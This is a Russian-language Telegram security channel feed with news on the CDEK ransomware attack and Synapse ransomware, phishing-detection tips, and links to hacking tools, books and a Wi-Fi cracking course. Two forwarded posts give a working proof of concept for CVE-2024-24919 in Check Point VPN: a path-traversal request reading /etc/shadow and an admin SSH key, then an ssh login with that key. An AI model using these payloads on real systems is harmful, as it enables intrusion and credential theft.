Про ИБ: канал собирает хаки, уязвимости, и бреши в информационной безопасности
21 subscribers
1.99K photos
275 videos
152 files
2.28K links
Мой канал «О жизни через призму двух сторон ИБ - хакинга и и информационной безопасности»

Ну и немного личного, конечно
Download Telegram
↔️ Обнаружение Фишинга

Чтобы обнаружить попытку фишинга, важно понять методы фишинга, которые используются в настоящее время.

Этот пост основан на идее, что злоумышленники попытаются каким-то образом имитировать или использовать доменное имя жертвы.

🤠 Если ваш домен называется example.com, и вы фишифуете, используя совершенно другое доменное имя по какой-то причине, например youwonthelottery.com, эти методы не раскроют его.

Легко раскрыть те попытки фишинга, которые будут использовать аналогичное доменное имя внутри электронной почты. Достаточно создать список наиболее вероятных фишинговых имен, которые может использовать злоумышленник, и проверить, зарегистрирован ли он, или просто проверить, есть ли какой-либо IP-адрес, использующий его.


↘️ Hacktricks

💙Записки Безопасника
СДЭК взломали хакеры — сервис не работает уже третий день.

Они использовали вирус-шифровальщик и лишили компанию базы данных.

Тред хакера:
https://x.com/head_mare/status/1795072931489345946

1/7 Хэд Марэ не дала времени #СДЭК на то, чтобы защитить себя. Сисадмины оказались слишком слабы. А политики безопасности не оправдали себя. #СДЭК продолжает нести знамя худшей доставки по России, обгоняя даже почту рф

2/7 Настройка и бекапирование корпоративных систем - дело неблагородное. «Что случилось с бекапами»? - Спрашивают консультанты по безопасности.- «Они пропали». - Отвечает им Хэд Марэ. Криворукие админы на маленькой зп делали бекап раз в полгода.

3/7 Шифровальщик крутится, данныемутятся. У #СДЭК серверов нет, но вы держитесь! Решения ваших бед не существует, даже не пытайтесь.

4/7 Клиенты #СДЭК не жалуйтесь. Посылки отменяются на неопределенное время. Проверьте ваш регион в перечне сбоев.

5/7 Убытки рассчитывать -это для господ. Все о ваших посылках – в надежных руках!

6/7 Дорогим консультантам с #BiZone отдельный привет. Ваш софт бесполезен, ваши безопасникипраздно шатаются на конференции #PHdays. Хэд Марэ любит тех, кто доверился Вам!

7/7 П.С. Alles, скажи "Да" неизвестному добряку с Дикси!
Интересная концепция "пяти P", которая предлагает фокусироваться в первую очередь на обеспечении пяти ключевых направлений ИБ в любой организации, которые позволяют сильно поднять уровень ИБ в организации:
1️⃣ 🔤assword (пароли). Выбирайте надежные пароли и используйте многофакторную аутентификацию.
2️⃣ 🔤rivilege access (привилегированный доступ). Ограничьте число людей, имеющих привилегированный доступ, а также поставьте их на дополнительный мониторинг.
3️⃣ 🔤atching (патчи). Вовремя обновляйтесь!
4️⃣ 🔤hishing (фишинг). Защищайтесь от основного вектора реализации атак - фишинга.
5️⃣ 🔤entests (пентесты). Проверяйте на практике, как вы защищены!

Когда у вас конь не валялся в ИБ и надо с чего-то начать, эти 5 пунктов могут вполне себе быть той точкой отсчета, которая обеспечит правильное движение в сторону защищенной организации.
Please open Telegram to view this post
VIEW IN TELEGRAM
Интересная история... Питерская компания столкнулась с шифровальщиком 🤒, который очень серьезно накрыл весь бизнес, заставив генерального директора компании даже опубликовать ✍️ официальное уведомление о невозможности компанией исполнять принятые на себя обязательства 😠 При этом компания ссылается на п.3 ст.401 Гражданского Кодекса, которая гласит, что
"лицо, не исполнившее или ненадлежащим образом исполнившее обязательство при осуществлении предпринимательской деятельности, несет ответственность, если не докажет, что надлежащее исполнение оказалось невозможным вследствие непреодолимой силы, то есть чрезвычайных и непредотвратимых при данных условиях обстоятельств."
😠
И мне, конечно, интересно, как компания будет доказывать факт чрезвычайности и непредотвратимости. Согласно постановлению Президиума ВАС РФ 👨‍⚖️ непреодолимая сила должна "исходить извне" (если это не история с внутренним нарушителем, как в другом известном инциденте последнего времени, то подходит) и зависеть от субъективных факторов. Иными словами, эта сама непреодолимая сила должна
☄️ "выходить за пределы нормального, обыденного",
☄️ не должна относиться к "обычному риску",
☄️ не может быть заранее "учтена ни при каких обстоятельствах",
☄️ должна быть "объективно, а не субъективно непредотвратима (в отличие от случая)".

И вот как отнести обычную хакерскую атаку 😷 к необыденному, к необычному, к неучтенному и к непредотвратимому, я не знаю 😔 Об этом говорится из каждого утюга и последние годы не проходит дня, чтобы про хакерские атаки и атаки шифровальщиков где-то да не написано было.

ЗЫ. Пункт меню "Удаленные рабочие места в облаке" в шапке заиграл новыми красками ☺️
Please open Telegram to view this post
VIEW IN TELEGRAM
🖥 Репозиторий: Evilginx2 — инструмент фишинга

Evilginx2 — это инструмент, предназначенный для проведения атак методом фишинга и захвата учетных данных пользователей. Он позволяет создавать поддельные веб-сайты, которые используются для перехвата логинов, паролей и других конфиденциальных данных пользователей.

— Данный инструмент обеспечивает широкие возможности для проведения атак фишинга, включая:
1. Создание поддельных веб-страниц для популярных онлайн-сервисов;
2. Анализ сессий пользователей;
3. Автоматизацию процесса захвата учетных данных.

Ссылка на GitHub

#Phishing
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from SecAtor
Исследователи CyFirma обнаружили на RAMP новую RaaS Synapse, реализуемую на хакерских форумах с февраля 2024 года как одну из самых быстрых на сегодняшний день ransomware.

Одна из основных замеченных особенностей вредоносного ПО - это выполнение проверки часового пояса и языка системы, приводящая к завершению работы, если обнаружено, что какая-либо из них базируется в Иране.

Кроме того, Synapse шифрует данные телеметрии перед отправкой их на сервер C2 с использованием специального алгоритма с примечательной входной строкой: “Chuong Dong looks like <REDACTED>!!”

Та же строка используется в методологии шифрования семейства Babuk Ransomware.

Учитывая утечку исходников Babuk Ransomware в 2021 году, налицо все признаки того, что владельцы Synapse использовали функциональные возможности его кода или вообще могли быть связи с его разработчиками.

Анализ показывает, что SynapseCrypter позаимствовал множество функций и у Lambda Ransomware, связанной с группой VoidCrypt.

Изученная стабильная версия Synapse 1.0.0 представляет новый мощный штамм программы-вымогателя с расширенными функциями, с C2, сборщиком полезной нагрузки и системой чата на базе TOR.

Ransomware предотвращает повреждение файлов, использует схемы быстрого шифрования и предлагает гибкие режимы, включая пользовательские параметры.

Помимо упомянутых функций, SynapseCrypter может похвастаться дополнительными возможностями.

Он включает в себя функции сетевого сканирования и возможность репликации на сетевых устройствах с использованием жестко запрограммированных учетных данных, хранящихся в его конфигурации.

SynapseCrypter
использует поиск NTFS для просмотра файлов и CHACHA8 для их шифрования, проверяет наличие файлов и папок в белом списке перед шифрованием, поддерживает очистку теневых копий и самоудаление.

После шифрования Synapse производит переименование файлов, изменение обоев и значков, а также удаление данных.

В отличие от некоторых других программ-вымогателей, Synapse не задействует сайт утечки данных. Вместо этого его операторы взаимодействуют с жертвами через TOR для переговоров о выкупе.

Ресерчеры отмечают, что появление Synapse RaaS подчеркивает динамично меняющийся ландшафт угроз ransomware, где новая ransomware с его избирательным подходом к шифрованию и заимствованными функциями у других штаммов представляет серьезную угрозу.
🇷🇺Минцифры РФ создаст «системы-предохранители» для помощи россиянам, находящимся под влиянием мошенников

Министерство цифрового развития России запланировало разработку специальных «систем-предохранителей», необходимых для 🔒защиты российских пользователей в тех ситуациях, когда они совершают попытки перевести деньги, взять микрозайм или кредит в банке, находясь под влиянием телефонных мошенников и 🦹🏼‍♂️киберпреступников. Соответствующее заявление сделал руководитель ведомства Максут Шадаев.

Министр цифрового развития РФ в ходе своего доклада на мероприятии TAdviser SummIT заявил, что в России требуется уже сейчас создать некие «системы-предохранители» для того, чтобы российские граждане, находящиеся под влиянием мошенников или киберпреступников, не совершали каких-либо денежных транзакций, способных привести к серьёзным для них последствиям в виде потери денежных средств.

Максут Шадаев подчеркнул, что подобные «системы-предохранители» должны запускаться в том случае, если банк, например, выявляет признаки того, что человек действует по принуждению или находясь под влиянием злоумышленников, например, совершает различные подозрительные банковские переводы, берёт несколько микрозаймов или делает множество заявок на получение онлайн-кредита.

При этом министр указывает на то, что подобные «системы-предохранители» могут включать в себя механизмы дополнительных проверок или согласования совершения различных банковских операций, когда финансовые учреждения с помощью своих систем безопасности видят что-то подозрительное и нестандартное в действиях своего клиента.

Максут Шадаев также заявил, что для внедрения таких систем потребуется полностью перестраивать все нынешние процессы взаимодействия между участниками рынка — правоохранительными органами, банковскими учреждениями, различными интернет-платформами и мобильными операторами.

Другие новости про ИБ в России здесь.
Forwarded from Proxy Bar
CVE-2024-24919
*
Check Point Remote Access VPN 0-Day
*
FOFA link
*
POC:
POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow


#0day #checkpoint
Forwarded from Proxy Bar
CVE-2024-24919 Check Point Remote Access VPN 0-Day
Ну или так 👌
aCSHELL/../../../../../../../
home/admin/.ssh/id_rsa

*
ssh admin@Хостъ -i id_rsa

#shitPointVPN #0Day
Forwarded from S.E.Reborn
💻 Шпаргалка по основам #SQL с примерами и пояснением запросов.

#SQL #CheatSheet
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Wifi_Pentesting_Взлом_Wifi_Новый_взгляд_2021.rar
2.4 GB
🌐 Wifi Pentesting | Взлом Wifi - Новый взгляд

📚 Русский
💰 35$
📂 2.5GB
🕔 2.30минут

🤖 В данном курсе:

Основы безопасности Wi-Fi и взлома паролей;
Использование инструментов 👩‍💻 Kali Linux для тестирования беспроводных сетей;
Настройка и использование атак на Wi-Fi сети, таких как атаки на WPA/WPA2;
Защита Wi-Fi сетей от взлома.

💙Записки Безопасника
Please open Telegram to view this post
VIEW IN TELEGRAM
📖 Active Directory глазами хакера

Рассмотрена архитектура системы безопасности Active Directory. Приведены сведения об используемом хакерами инструментарии.

Последовательно и подробно описываются все этапы атаки на домен глазами злоумышленника: поиск уязвимостей и разведка в атакуемой сети, повышение привилегий, боковое перемещение, поиск и сбор критически важных данных.

Описаны способы противодействия обнаружению атаки с применением различных инструментальных средств.

Рассматриваются методы сохранения доступа к скомпрометированной сети как с помощью сторонних инструментов, так и с использованием групповых политик домена.

Автор: Ralf Hacker
Год выхода: 2021

🗄 Читать книгу – линк.

// Не хакинг, а ИБ
Please open Telegram to view this post
VIEW IN TELEGRAM
🖥 Репозиторий: TLS Prober — анализ TLS

TLS Prober — это инструмент, специально разработанный для анализа безопасности протокола TLS.

— Данный инструмент обладает функционалом для сканирования безопасности TLS. Он помогает выявлять слабые места в настройках TLS, обеспечивая возможность улучшить защиту передаваемой информации.

Ссылка на GitHub

#Tools #Network
Please open Telegram to view this post
VIEW IN TELEGRAM
Хакинг на LINUX.pdf
27.8 MB
😁 Хакинг на Linux

Данная книга расскажет, как использовать Linux для несанкционированного доступа к информационным системам, или, попросту говоря, для взлома.

Первая часть книги показывает, как взломать саму Linux – вы познакомитесь с основами Linux; узнаете, как взломать локальную Linux-систему и получить права root, поговорим о различных уязвимостях в системе шифрования файлов и папок eCryptfs; ну и, в заключение первой части, будет показано как взломать Apache, MySQL, а также CMS WordPress.

Вторая часть книги расскажет, как использовать различные инструменты, доступные в Linux, для взлома других систем (в том числе и Linux) – познакомимся с хакерским дистрибутивом Kali Linux и узнаем о лучших инструментах из этого дистрибутива; расскажем как взломать аккаунт в социальной сети; научимся скрывать свою деятельность с помощью Тоr; попробуем взломать Android-приложение посредством инструментов, входящих в состав Linux и еще много чего интересного.

Колисниченко Д. 2022

#book // cyber in network security
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from infosec
🔐 Взлом Отеля.

• Вы когда нибудь отдавали свой паспорт для регистрации при заселении в отель или гостиницу? А задумывались над тем, что ваши данные могут оказаться в руках хакеров?

• Короткая, но интересная статья про пентест отеля и уязвимости, благодаря которым пентестер получил доступ к персональным данным и всем хостам в сети объекта.

Читать статью: https://teletype.in/

#Пентест
Please open Telegram to view this post
VIEW IN TELEGRAM
🏠 Тестирования на проникновение веб-браузеров

BeEF
(Browser Exploitation Framework) фреймворк эксплуатации браузеров.

Это инструмент для тестирования на проникновение, который фокусируется на веб-браузерах.

На фоне растущей обеспокоенности по поводу атак из глобальной сети в отношение клиентов, включая мобильных клиентов, BeEF, используя векторы атаки на стороне клиента, позволяет профессиональным тестерам на проникновение оценить действительное состояние безопасности в целевом окружении

🗄 Репозиторий на GitHub – линк.

// Не хакинг, а ИБ
Please open Telegram to view this post
VIEW IN TELEGRAM
🖥 Репозиторий: DFTDC — отключение телеметрии

Это набор различных настроек на странице параметров Firefox, которые помогут свести к минимуму отправляемую телеметрию и сбор данных.

— Важное уточнение: После использования репо, как вы переключите эти параметры, Firefox по-прежнему будет собирать и отправлять данные на свои серверы, но в гораздо меньших объемах.

Ссылка на GitHub

#Firefox #Data #Telemetry
Please open Telegram to view this post
VIEW IN TELEGRAM
🤖 История группы 414 — подростков из Милуоки, которые стали пионерами взлома

В 1983 году группа молодых людей из Милуоки прославилась взломом нескольких высококлассных компьютерных систем, включая Национальную лабораторию Лос-Аламоса и Мемориальный онкологический центр им. Слоуна Кеттеринга.

В начале 1980-х годов наступила эра компьютерной культуры. Первый персональный компьютер IBM появился в 1981 году, принеся в массы термин «персональный компьютер». В следующем году был представлен Commodore 64; позже эта модель станет самой продаваемой моделью всех времён. К 1983 году как фанатам техники, так и более осторожным её владельцам понравились возможности ПК. В том же году The New York Times перешла на цифровой формат с помощью первого компьютера в отделе новостей.


Группу 414 можно назвать не только пионерами взлома, но и первыми 😒 пентестерами. Если в 80х число потенциальных объектов для взлома было невелико, то сейчас количество IT-систем и цифровизированных объектов увеличивается с каждым годом. И все они нуждаются в «проверке на прочность».

👍🏻 пионерам взлома

↘️ Habr.com

💙Записки Безопасника
Please open Telegram to view this post
VIEW IN TELEGRAM